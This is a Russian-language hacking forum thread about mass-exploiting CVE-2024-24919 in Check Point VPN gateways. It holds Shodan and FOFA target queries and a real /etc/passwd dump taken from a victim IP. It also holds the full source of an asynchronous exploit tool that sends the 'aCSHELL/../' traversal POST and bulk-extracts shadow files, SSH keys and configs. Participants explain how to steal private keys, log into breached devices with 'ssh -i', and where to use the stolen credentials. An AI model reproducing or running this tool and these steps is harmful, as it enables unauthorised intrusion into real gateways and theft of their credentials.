
Remote CVE-2024-24919 Check Point Remote Access VPN

Focus17


Shodan"Server: Check Point SVN"
fofatitle=="Check Point SSL Network Extender"


Код:
python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd


    ______     ____  __         _ ______        
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /  
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/    
 
                    @RevoltSecurities

[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

shodan count "Server: Check Point SVN"
53758
 
Брутить заёба, но собрали приятно.
 

Correct Usage of aiohttp for Ensuring Proper Session Closure

Python:
async def run_threads(urls, args):
    """
    Manage threads and event loop for exploitation.

    Deduplicates *urls*, bounds concurrency with a semaphore of size
    ``args.threads``, installs uvloop, and runs ``load_tasks()`` inside a
    single ``aiohttp.ClientSession`` so the session is closed when the
    ``async with`` block exits (the point of this variant, per the post
    title). ``load_tasks`` is not defined on this page.
    """
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        uvloop.install()
        async with aiohttp.ClientSession() as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                await load_tasks(urls, session, sem, bar, args)
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")
 
У кого нибудь работает ShodaX?
не могу запустить, пишет мол если так происходит всегда, отпишите разрабу. Очевидно отпишешь и тебе предложат "лицензию")



[INFO]: Import Error occured in Module imports due to: attempted relative import with no known parent package
[INFO]: If you are encountering this issue more than a time please report the issues in ShodanX Github page..
 
aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?
отфильтровал 22 открытый - рефузы по айпи и тд. Пробовал через клиент win - чет не особо удачно, может мало кредов перебрал .
Там уже сразу залился товарищ некий везде - кто видел тот знает . Интересно тоже как его креды там в шэдоу появились

Уязвимы как понимаю куча gateway разных продуктов - самая уяза в webpage ssl extender . (при посещении уязвимого сервиса вылазит этот pop-up)
Вот собственно список уязвимых Gateway - продуктов.
ProductCloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances
VersionR77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
 
Python:
async def exploit(session, url: str, sem, bar):
    """
    Per-target worker. Reads the module-global ``args`` (not visible here).

    With ``args.full`` set, every path in ``files_to_fetch`` is requested and
    each hit is written under ``success/<url with non-word chars -> '_'>/``
    with the path's slashes replaced by underscores. Otherwise only
    ``args.file_to_dump`` is requested, printed, and appended to the results
    file via ``save()``.

    Defender note: a gateway that answered any of these reads has exposed
    credential material (shadow, SSH keys, VPN/firewall config). Treat those
    secrets as compromised and rotate them after patching.
    """
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url))
            # Paths requested in --full mode; entries with a trailing '/' are sent as-is.
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))

            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")

        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass

    except aiohttp.ClientConnectionError:
        if args.verbose:
            # Message says "Timeout" for any connection error, not only timeouts.
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")

    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: this handler is effectively a no-op
    except asyncio.CancelledError:
        SystemExit  # same: the cancellation is swallowed here
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()  # advance the progress bar for this target
        sem.release()  # pairs with sem.acquire() done by the caller before the task was created

create a new folder called "success" and edit this part of the code
 
Python:
async def save(result, args, target_folder=None, filename="results.txt"):
    """
    Append *result* plus a newline to an output file.

    With *target_folder* set (the --full path) the folder is created on
    demand and *filename* is placed inside it. Otherwise the destination is
    ``args.output`` — an existing file, an existing directory (which gets
    results.txt), or a new path — falling back to ``results.txt``.
    Every exception other than KeyboardInterrupt/CancelledError is
    swallowed, so a failed write leaves no trace.
    """
    try:
        if target_folder:
            if not os.path.exists(target_folder):
                os.makedirs(target_folder)
            filename = os.path.join(target_folder, filename)
        else:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, "results.txt")
                else:
                    filename = args.output
            else:
                filename = "results.txt"

        async with aiofiles.open(filename, "a") as w:
            await w.write(result + '\n')

    except KeyboardInterrupt:
        quit()
    except asyncio.CancelledError:
        SystemExit  # evaluated, not raised: effectively a no-op
    except Exception as e:
        pass  # write errors are silently dropped

async def fetch_file(session, url: str, file_path: str, proxy):
    """
    Send the CVE-2024-24919 path-traversal request for *file_path* to *url*
    and return the raw response body on HTTP 200, else None.

    Defender note: the stable part of this request is a POST to
    ``/clients/MyCRL`` whose body starts with ``aCSHELL/../`` — that is what
    to alert on in gateway/WAF logs. The User-Agent is randomised per
    request, so it is not a usable signature. ``ssl=False`` disables
    certificate verification on the client side.
    """
    base_url = f"{url}/clients/MyCRL"
    file_data = f"aCSHELL/../../../../../../..{file_path}"

    headers = {
        "User-Agent": UserAgent().random,  # presumably fake_useragent; its import is not visible here
        "Content-Length": str(len(file_data))
    }

    async with session.post(base_url, timeout=10, headers=headers, proxy=proxy, ssl=False, data=file_data) as response:
        await asyncio.sleep(0.0001)
        if response.status == 200:
            return await response.content.read()
    return None

async def exploit(session, url: str, sem, bar):
    """
    Per-target worker. Reads the module-global ``args`` (not visible here).

    With ``args.full`` set, every path in ``files_to_fetch`` is requested and
    each hit is written under ``success/<url with non-word chars -> '_'>/``
    with the path's slashes replaced by underscores. Otherwise only
    ``args.file_to_dump`` is requested, printed, and appended to the results
    file via ``save()``.

    Defender note: a gateway that answered any of these reads has exposed
    credential material (shadow, SSH keys, VPN/firewall config). Treat those
    secrets as compromised and rotate them after patching.
    """
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url))  # Replace non-alphanumeric characters with underscore
            # Paths requested in --full mode; entries with a trailing '/' are sent as-is.
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))

            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")

        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass

    except aiohttp.ClientConnectionError:
        if args.verbose:
            # Message says "Timeout" for any connection error, not only timeouts.
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")

    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: this handler is effectively a no-op
    except asyncio.CancelledError:
        SystemExit  # same: the cancellation is swallowed here
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()  # advance the progress bar for this target
        sem.release()  # pairs with sem.acquire() in loader()

async def loader(urls, session, sem, bar):
    """
    Fan ``exploit()`` out over *urls* as asyncio tasks.

    The semaphore is acquired here before each task is created and released
    in ``exploit()``'s ``finally`` block, so task creation itself throttles
    to the semaphore's size. ``gather(return_exceptions=True)`` keeps one
    failed task from cancelling the others.
    """
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)

        await asyncio.gather(*tasks, return_exceptions=True)
    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: effectively a no-op
    except asyncio.CancelledError:
        SystemExit  # same
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")

async def threads(urls):
    """
    Deduplicate *urls*, set up the semaphore, HTTP session and progress bar,
    then run ``loader()``.

    NOTE(review): ``await loader(...)`` already performs all the work and
    returns None; ``loops.run_until_complete(None)`` is then called on a loop
    that is already running (this coroutine is driven by ``asyncio.run`` in
    ``main``), which is presumably the RuntimeError the handler below
    swallows. ``asyncio.get_event_loop()`` from a running coroutine returns
    the running loop, so ``customloops`` is likely never the loop actually
    used — confirm.
    """
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        customloops = uvloop.new_event_loop()
        asyncio.set_event_loop(loop=customloops)
        loops = asyncio.get_event_loop()
        async with aiohttp.ClientSession(loop=loops) as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                loops.run_until_complete(await loader(urls, session, sem, bar))
    except RuntimeError:
        pass  # see the NOTE in the docstring
    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: effectively a no-op
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")

async def main():
    """
    Build the target list from ``--url`` and/or ``--list`` and hand it to
    ``threads()``.

    A target without a scheme is expanded to both ``https://`` and
    ``http://`` variants. ``urls`` is not cleared between the two branches,
    so when both options are given the ``--url`` targets are run a second
    time together with the list. ``args`` is a module global parsed
    elsewhere (not visible on this page).
    """
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)

        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)

    except FileNotFoundError:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit  # evaluated, not raised: the function simply returns

    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    # Entry point; the global ``args`` used throughout is presumably parsed at module level elsewhere.
    asyncio.run(main())

new argument "--full"
 
aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?
отфильтровал 22 открытый - рефузы по айпи и тд. Пробовал через клиент win - чет не особо удачно, может мало кредов перебрал .
Там уже сразу залился товарищ некий везде - кто видел тот знает . Интересно тоже как его креды там в шэдоу появились

Уязвимы как понимаю куча gateway разных продуктов - самая уяза в webpage ssl extender . (при посещении уязвимого сервиса вылазит этот pop-up)
Вот собственно список уязвимых Gateway - продуктов.
ProductCloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances
VersionR77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
why /home/root/.ssh/id_rsa
and not root/.ssh/id_rsa ?
 
Python:
async def save(result, args, target_folder=None, filename="results.txt"):
    """
    Append *result* plus a newline to an output file.

    With *target_folder* set (the --full path) the folder is created on
    demand and *filename* is placed inside it. Otherwise the destination is
    ``args.output`` — an existing file, an existing directory (which gets
    results.txt), or a new path — falling back to ``results.txt``.
    Every exception other than KeyboardInterrupt/CancelledError is
    swallowed, so a failed write leaves no trace.
    """
    try:
        if target_folder:
            if not os.path.exists(target_folder):
                os.makedirs(target_folder)
            filename = os.path.join(target_folder, filename)
        else:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, "results.txt")
                else:
                    filename = args.output
            else:
                filename = "results.txt"

        async with aiofiles.open(filename, "a") as w:
            await w.write(result + '\n')

    except KeyboardInterrupt:
        quit()
    except asyncio.CancelledError:
        SystemExit  # evaluated, not raised: effectively a no-op
    except Exception as e:
        pass  # write errors are silently dropped

async def fetch_file(session, url: str, file_path: str, proxy):
    """
    Send the CVE-2024-24919 path-traversal request for *file_path* to *url*
    and return the raw response body on HTTP 200, else None.

    Defender note: the stable part of this request is a POST to
    ``/clients/MyCRL`` whose body starts with ``aCSHELL/../`` — that is what
    to alert on in gateway/WAF logs. The User-Agent is randomised per
    request, so it is not a usable signature. ``ssl=False`` disables
    certificate verification on the client side.
    """
    base_url = f"{url}/clients/MyCRL"
    file_data = f"aCSHELL/../../../../../../..{file_path}"

    headers = {
        "User-Agent": UserAgent().random,  # presumably fake_useragent; its import is not visible here
        "Content-Length": str(len(file_data))
    }

    async with session.post(base_url, timeout=10, headers=headers, proxy=proxy, ssl=False, data=file_data) as response:
        await asyncio.sleep(0.0001)
        if response.status == 200:
            return await response.content.read()
    return None

async def exploit(session, url: str, sem, bar):
    """
    Per-target worker. Reads the module-global ``args`` (not visible here).

    With ``args.full`` set, every path in ``files_to_fetch`` is requested and
    each hit is written under ``success/<url with non-word chars -> '_'>/``
    with the path's slashes replaced by underscores. Otherwise only
    ``args.file_to_dump`` is requested, printed, and appended to the results
    file via ``save()``.

    Defender note: a gateway that answered any of these reads has exposed
    credential material (shadow, SSH keys, VPN/firewall config). Treat those
    secrets as compromised and rotate them after patching.
    """
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url))  # Replace non-alphanumeric characters with underscore
            # Paths requested in --full mode; entries with a trailing '/' are sent as-is.
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))

            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")

        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass

    except aiohttp.ClientConnectionError:
        if args.verbose:
            # Message says "Timeout" for any connection error, not only timeouts.
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")

    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: this handler is effectively a no-op
    except asyncio.CancelledError:
        SystemExit  # same: the cancellation is swallowed here
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()  # advance the progress bar for this target
        sem.release()  # pairs with sem.acquire() in loader()

async def loader(urls, session, sem, bar):
    """
    Fan ``exploit()`` out over *urls* as asyncio tasks.

    The semaphore is acquired here before each task is created and released
    in ``exploit()``'s ``finally`` block, so task creation itself throttles
    to the semaphore's size. ``gather(return_exceptions=True)`` keeps one
    failed task from cancelling the others.
    """
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)

        await asyncio.gather(*tasks, return_exceptions=True)
    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: effectively a no-op
    except asyncio.CancelledError:
        SystemExit  # same
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")

async def threads(urls):
    """
    Deduplicate *urls*, set up the semaphore, HTTP session and progress bar,
    then run ``loader()``.

    NOTE(review): ``await loader(...)`` already performs all the work and
    returns None; ``loops.run_until_complete(None)`` is then called on a loop
    that is already running (this coroutine is driven by ``asyncio.run`` in
    ``main``), which is presumably the RuntimeError the handler below
    swallows. ``asyncio.get_event_loop()`` from a running coroutine returns
    the running loop, so ``customloops`` is likely never the loop actually
    used — confirm.
    """
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        customloops = uvloop.new_event_loop()
        asyncio.set_event_loop(loop=customloops)
        loops = asyncio.get_event_loop()
        async with aiohttp.ClientSession(loop=loops) as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                loops.run_until_complete(await loader(urls, session, sem, bar))
    except RuntimeError:
        pass  # see the NOTE in the docstring
    except KeyboardInterrupt:
        SystemExit  # evaluated, not raised: effectively a no-op
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")

async def main():
    """
    Build the target list from ``--url`` and/or ``--list`` and hand it to
    ``threads()``.

    A target without a scheme is expanded to both ``https://`` and
    ``http://`` variants. ``urls`` is not cleared between the two branches,
    so when both options are given the ``--url`` targets are run a second
    time together with the list. ``args`` is a module global parsed
    elsewhere (not visible on this page).
    """
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)

        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)

    except FileNotFoundError:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit  # evaluated, not raised: the function simply returns

    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    # Entry point; the global ``args`` used throughout is presumably parsed at module level elsewhere.
    asyncio.run(main())

new argument "--full"
не работают твои аргументы --full !!!
странно ввёл ip имя пользователя пароль ввёл пишет не верное имя пользователя или пароль
 
aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?
id_rsa это приват ключик - его надо себе сохранить и дальше на ссш логиниться типо так: ssh -i id_rsa root@пробитый_девайс
 
admin:x:0:0:Linux User,,,:/:/bin/clish
попробуй тянуть

/home/admin/.ssh/id_rsa
/home/tsteele/.ssh/id_rsa
/home/tricky/.ssh/id_rsa

и как выше написал логиниться на ссш под этими юзерами с ключиками
 

